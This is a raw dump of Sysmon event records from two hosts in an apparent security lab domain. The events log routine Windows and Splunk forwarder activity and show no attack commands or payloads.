21:48:02.623{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105258Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.623{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105257Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.623{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105256Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.623{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105255Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.622{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-7192-60CA-3B13-00000000CF01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105254Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.622{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7192-60CA-3B13-00000000CF01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105253Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.621{54715871-7192-60CA-3B13-00000000CF01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000105252Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:02.621{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=291C029A1FE88932D8951D06296AACD3,SHA256=F5F6C650ADBE6F53B103B3DB6C1737B9EEDC6548273ECF6E4EC42A5EA41FF565,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152022Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:02.943{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5321E4BFD747AE3E75BDDA48048D3E5F,SHA256=EB7C54570A25F1376CE733CBE81B31191D2365331DB211B9267284B696F7053E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105262Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:03.555{54715871-FD28-60C9-3000-00000000CF01}2448NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=87657D68C727D4F417C5346ABF35F152,SHA256=9C850A5D797C891B275B40E6DB9307C8C7979F29879EB6EAEEA9A86ED4C088D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152023Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:03.991{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F216FAB931493264A2C092D5FA8AE89F,SHA256=80FA35996E744C1351B97968111E9F033C2ADFA6BE5E32BFD76743005EE6A424,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105271Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.633{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7194-60CA-3C13-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105270Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.633{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C25925CAFDFC7D3B992AB8F2DE269DC,SHA256=467F3539369C00166F2A6C9F9BAB5E62433A8276DC7BDFC3DD0917A6DA7299E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105269Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.629{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105268Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.629{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105267Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.629{54715871-FD16-60C9-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{54715871-7194-60CA-3C13-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105266Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.629{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105265Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.629{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105264Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.629{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-7194-60CA-3C13-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105263Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:04.628{54715871-7194-60CA-3C13-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000152032Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.991{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD3C41F1163B8784B3DF4E5388668E7B,SHA256=BE37771FE0128F0D526E9FA2FAF8FBCEE7DAB16DF3E735A310C837F77948A309,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152031Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-7194-60CA-2C0D-00000000D101}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152030Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152029Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152028Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152027Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000152026Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-7194-60CA-2C0D-00000000D101}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000152025Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.591{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-7194-60CA-2C0D-00000000D101}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000152024Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:04.592{39BD8DE3-7194-60CA-2C0D-00000000D101}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000105272Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:03.226{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55447-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000152042Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.647{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E4686D10D72560C3D3C544E455C4FA7,SHA256=645BBC5DBA437D68F03DC7028658BBA8D960E80B7B013A55803243EA602E2BD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000152041Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:48:05.634{39BD8DE3-7195-60CA-2D0D-00000000D101}65126480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 